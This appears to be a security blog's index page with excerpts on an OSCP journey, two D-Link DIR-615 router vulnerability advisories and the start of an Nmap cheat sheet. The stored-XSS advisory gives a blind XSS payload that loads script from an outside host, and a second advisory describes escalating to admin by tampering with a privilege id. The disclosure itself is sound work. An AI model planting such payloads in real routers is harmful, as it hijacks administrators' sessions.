Posts

My OSCP Journey — 30–03–2020

Image
Hi guys 😊 First things first, I hope all of you and your families are safe during this COVID-19 pandemic.  Stay Home, Stay Safe  and please take care of your loved ones!! A heartfelt thank you to God, my family, friends, brothers, sisters, and girlfriend that upheld me with prayer and support throughout this journey. I could not have done this without you. A brief introduction about myself – I am currently working as a Cybersecurity Consultant in PwC and I am a bigtime security enthusiast with 3.5+ years of experience in Web/ Mobile/ Network Vulnerability Assessments and Penetration Testing. This field has always been my passion. I will detail down my entire journey which led me to earn the OSCP certification so that you guys can also chart your own paths and estimate the effort and time required from your end to make your dream turn into a reality. Time spent prior to registering for the certification… My OSCP journey started around April 2019 when I mentioned

D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

############################## ############################## ########################## # Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting # Date: 13.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage:  http://www.dlink.co. in # Category: Hardware (Wi-fi Router) # Hardware Link:  http://www.dlink.co.in/ products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19742 ############################## ############################## ########################### Reproduction Steps:  — — — — — — — — — — — — — — —  Login to your wi-fi router gateway with admin credentials [i.e:  http://192.168.0.1 ] Go to Maintenance page and click on Admin on the left pannel. Put blind XSS Payload in to the name field — “><script src= https://ptguy.xss.ht ></ script>. This payload saved by the server and its reflected in the user page. Every refresh in the user home pag

D-Link DIR-615 Wireless Router —Vertical Privilege Escalation - CVE-2019–19743

Image
###################################################################################### # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation # Date: 10.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19743 ####################################################################################### Reproduction Steps: Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1 ] Go to the Maintenance page and click on Admin on the left panel. There is an option to create a user and by default, it shows only user accounts. Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite. Privilege Escalation Post Request

NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts)

Image
Hello Readers,Hope you are doing well. In this weekend, i learned about Nmap tool, scanning types, scanning commands and some NSE Scripts from different blogs. I gather good contents , so i want to share my research with you. Hope you like it :) Nmap  : Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running. It was designed to rapidly scan large networks, but works fine against single hosts. NMAP (Image Source Google)   Various TCP/IP protocols Application layer : FTP, HTTP, SNMP, BOOTP, DHCP Transport layer : TCP, UD